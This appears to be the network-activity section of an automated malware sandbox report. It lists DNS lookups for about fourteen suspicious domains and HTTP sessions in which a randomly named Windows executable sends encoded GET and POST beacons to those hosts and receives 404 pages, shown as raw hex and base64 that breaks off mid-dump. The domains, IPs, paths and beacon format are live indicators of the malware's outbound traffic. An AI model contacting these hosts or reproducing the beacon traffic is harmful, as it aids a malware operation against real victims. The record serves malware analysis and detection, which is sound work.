                                                                                                                        Nov 20, 2024 16:54:06.230840921 CET192.168.2.111.1.1.10xcec8Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:23.661644936 CET192.168.2.111.1.1.10x3949Standard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:39.350095987 CET192.168.2.111.1.1.10xfe14Standard query (0)www.yvcp3.infoA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:54.333287954 CET192.168.2.111.1.1.10xdaacStandard query (0)www.guacamask.onlineA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:12.349807024 CET192.168.2.111.1.1.10xfaa5Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:27.319801092 CET192.168.2.111.1.1.10xc728Standard query (0)www.bookingservice.centerA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:42.678258896 CET192.168.2.111.1.1.10x6a18Standard query (0)www.connecty.liveA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:57.648458958 CET192.168.2.111.1.1.10x64f2Standard query (0)www.seeseye.websiteA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:58.658006907 CET192.168.2.111.1.1.10x64f2Standard query (0)www.seeseye.websiteA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:13.289025068 CET192.168.2.111.1.1.10x2d6Standard query (0)www.bcg.servicesA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:28.683430910 CET192.168.2.111.1.1.10x5539Standard query (0)www.aiactor.xyzA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:43.584996939 CET192.168.2.111.1.1.10x59f7Standard query (0)www.76kdd.topA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:59.147289991 CET192.168.2.111.1.1.10xaa97Standard query (0)www.rafconstrutora.onlineA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:57:14.053189039 CET192.168.2.111.1.1.10xad38Standard query (0)www.614genetics.onlineA (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:57:30.521346092 CET192.168.2.111.1.1.10xfe9bStandard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Nov 20, 2024 16:54:06.904459953 CET1.1.1.1192.168.2.110xcec8No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:24.075999975 CET1.1.1.1192.168.2.110x3949No error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:24.075999975 CET1.1.1.1192.168.2.110x3949No error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:24.075999975 CET1.1.1.1192.168.2.110x3949No error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:24.075999975 CET1.1.1.1192.168.2.110x3949No error (0)1hong.pels5zqo.shop43.163.1.110A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:39.893897057 CET1.1.1.1192.168.2.110xfe14No error (0)www.yvcp3.info47.254.140.255A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:54:54.973490000 CET1.1.1.1192.168.2.110xdaacNo error (0)www.guacamask.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:12.813208103 CET1.1.1.1192.168.2.110xfaa5No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:12.813208103 CET1.1.1.1192.168.2.110xfaa5No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:28.236885071 CET1.1.1.1192.168.2.110xc728No error (0)www.bookingservice.center98.124.224.17A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:43.234446049 CET1.1.1.1192.168.2.110x6a18No error (0)www.connecty.live203.161.43.228A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:58.837333918 CET1.1.1.1192.168.2.110x64f2No error (0)www.seeseye.website103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:55:58.837354898 CET1.1.1.1192.168.2.110x64f2No error (0)www.seeseye.website103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:14.031459093 CET1.1.1.1192.168.2.110x2d6No error (0)www.bcg.services199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:29.310043097 CET1.1.1.1192.168.2.110x5539No error (0)www.aiactor.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:29.310043097 CET1.1.1.1192.168.2.110x5539No error (0)www.aiactor.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:44.248764038 CET1.1.1.1192.168.2.110x59f7No error (0)www.76kdd.top76kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:44.248764038 CET1.1.1.1192.168.2.110x59f7No error (0)76kdd.top38.47.232.194A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:59.615103960 CET1.1.1.1192.168.2.110xaa97No error (0)www.rafconstrutora.online172.67.159.24A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:56:59.615103960 CET1.1.1.1192.168.2.110xaa97No error (0)www.rafconstrutora.online104.21.34.103A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:57:14.790102959 CET1.1.1.1192.168.2.110xad38No error (0)www.614genetics.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                        Nov 20, 2024 16:57:31.293054104 CET1.1.1.1192.168.2.110xfe9bNo error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                                                                        • www.duwixushx.xyz
                                                                                                                        • www.1qcczjvh2.autos
                                                                                                                        • www.yvcp3.info
                                                                                                                        • www.guacamask.online
                                                                                                                        • www.supernutra01.online
                                                                                                                        • www.bookingservice.center
                                                                                                                        • www.connecty.live
                                                                                                                        • www.seeseye.website
                                                                                                                        • www.bcg.services
                                                                                                                        • www.aiactor.xyz
                                                                                                                        • www.76kdd.top
                                                                                                                        • www.rafconstrutora.online
                                                                                                                        • www.614genetics.online
                                                                                                                        • www.amayavp.xyz
                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.1149791156.251.17.224803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:07.050790071 CET505OUTGET /bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744= HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.duwixushx.xyz
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:54:08.617803097 CET691INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:08 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 548
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.114982943.163.1.110803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:24.213718891 CET783OUTPOST /od8t/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.1qcczjvh2.autos
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                                                        Referer: http://www.1qcczjvh2.autos/od8t/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 71 6b 30 7a 49 52 30 68 69 2f 4d 6f 62 50 38 44 66 36 71 47 38 7a 76 4d 79 48 66 37 48 70 68 45 63 41 64 74 34 63 34 41 5a 71 75 6d 74 6d 47 56 44 34 75 31 41 30 2f 73 6a 71 37 48 76 49 4b 64 50 6b 63 4f 65 64 39 63 2b 43 31 53 6c 44 43 37 74 65 54 64 72 63 7a 43 41 4d 6b 4c 35 77 69 46 57 41 57 2b 4d 7a 38 4d 4f 6e 73 71 39 66 49 5a 2b 69 50 31 59 4a 30 32 67 57 68 42 4f 4d 64 46 75 66 56 67 73 36 73 52 67 5a 46 78 31 62 4d 5a 6f 79 78 30 39 4f 72 71 67 46 37 4c 65 63 5a 57 6b 36 35 45 78 6c 57 6a 6d 2b 50 70 50 45 55 6f 39 54 77 67 67 3d 3d
                                                                                                                        Data Ascii: KV=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx09OrqgF7LecZWk65ExlWjm+PpPEUo9Twgg==
                                                                                                                        Nov 20, 2024 16:54:25.746002913 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: Tengine
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:25 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 58288
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "67344967-e3b0"
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:25.746026039 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                                        Nov 20, 2024 16:54:25.746134043 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                                        Nov 20, 2024 16:54:25.746330976 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                                                                                        Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                                                                                        Nov 20, 2024 16:54:25.746354103 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                                                                                        Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                                                                                        Nov 20, 2024 16:54:25.746366978 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                                                                                                                        Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                                                                                                                        Nov 20, 2024 16:54:25.746380091 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                                                                                                                        Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                                                                                                                        Nov 20, 2024 16:54:25.746395111 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                                                                                                                        Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                                                                                                                        Nov 20, 2024 16:54:25.746462107 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                                                                                                                        Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                                                                                                                        Nov 20, 2024 16:54:25.746624947 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                                                                                        Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.114983843.163.1.110803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:26.878608942 CET803OUTPOST /od8t/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.1qcczjvh2.autos
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                                                        Referer: http://www.1qcczjvh2.autos/od8t/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 4f 67 30 78 72 4a 30 70 69 2f 4c 32 72 50 38 4e 2f 37 43 47 38 76 76 4d 33 6a 78 37 30 4e 68 64 38 51 64 73 39 77 34 42 5a 71 75 70 4e 6d 4a 59 6a 34 62 31 42 49 42 73 6d 4b 37 48 76 4d 4b 64 50 30 63 4f 49 56 79 66 4f 43 33 48 31 43 6b 6d 39 65 54 64 72 63 7a 43 41 5a 4c 4c 35 6f 69 46 43 45 57 78 49 76 7a 50 4f 6e 76 72 39 66 49 4f 4f 69 31 31 59 4a 4b 32 69 6a 70 42 4d 45 64 46 76 76 56 6a 35 61 6a 61 67 5a 50 75 46 61 54 4a 4e 47 2f 30 50 4c 33 74 47 39 4d 50 39 67 50 65 43 33 6a 55 53 73 42 67 31 32 4e 39 70 6c 6b 68 4d 32 35 37 6f 48 75 31 58 43 4e 71 6c 76 74 56 30 74 75 35 77 4e 76 43 45 55 3d
                                                                                                                        Data Ascii: KV=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70Nhd8Qds9w4BZqupNmJYj4b1BIBsmK7HvMKdP0cOIVyfOC3H1Ckm9eTdrczCAZLL5oiFCEWxIvzPOnvr9fIOOi11YJK2ijpBMEdFvvVj5ajagZPuFaTJNG/0PL3tG9MP9gPeC3jUSsBg12N9plkhM257oHu1XCNqlvtV0tu5wNvCEU=
                                                                                                                        Nov 20, 2024 16:54:28.418620110 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: Tengine
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:28 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 58288
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "67344967-e3b0"
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:28.418751001 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
